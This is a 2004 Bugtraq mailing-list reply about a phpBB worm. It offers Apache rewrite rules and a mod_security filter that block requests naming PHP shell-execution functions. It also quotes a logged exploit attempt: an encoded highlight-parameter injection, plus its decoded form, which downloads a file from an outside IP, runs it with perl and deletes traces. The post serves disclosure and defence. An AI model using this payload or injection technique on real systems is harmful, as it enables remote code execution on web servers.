Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: phpBB Worm
From: Sebastian Wiesinger <bofh () fire-world de>
Date: Wed, 22 Dec 2004 12:22:15 +0100

* Raymond Dijkxhoorn <raymond () prolocation net> [2004-12-22 00:06]:
If you cannot fix it (virtual servers) fast for all your clients you could 
also try with something like this:

        RewriteEngine On
        RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
        RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
        RewriteRule ^.*$                                -               [F]

We had some vhosts where this worked just fine. On our systems we didnt 
see any valid request with echr and esystem, just be gentle with it, it 
works for me, it could work for you ;)

If you use mod_security, this may help, too:

SecFilterSelective "THE_REQUEST" "(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\("

I had another exploit attempt, with this payload:

66.119.13.4 - - [22/Dec/2004:10:06:47 +0100] "GET 
/forum/viewtopic.php?t=%37&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%31%32%38%2E%31%37%34%2E%31%33%37%2E%32%33%30%2F%62%6E%20%2D%4F%20%2E%62%3B%20%70%65%72%6C%20%2D%70%65%20%79%2F%74%68%6D%76%64%77%30%39%38%37%36%35%34%33%32%31%75%6F%69%65%61%2F%61%65%69%6F%75%31%32%33%34%35%36%37%38%39%30%77%64%76%74%68%6D%2F%20%2E%62%7C%20%70%65%72%6C%3B%20%72%6D%20%2D%66%20%2E%62%20%2A%2E%70%6C%20%62%30%74%2A%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
 HTTP/1.1" 200 12266 "-" "-"

Which decodes to:

rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| 
perl; rm -f .b *.pl b0t*; echo _END_
highlight='.passthru($HTTP_GET_VARS[rush]).'

Regards,

Sebastian

-- 
GPG Key-ID: 0x76B79F20 (0x1B6034F476B79F20)
Wehret den Anfaengen: http://odem.org/informationsfreiheit/
Thunder rolled. ... It rolled a six.
  --Terry Pratchett, Guards! Guards!


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]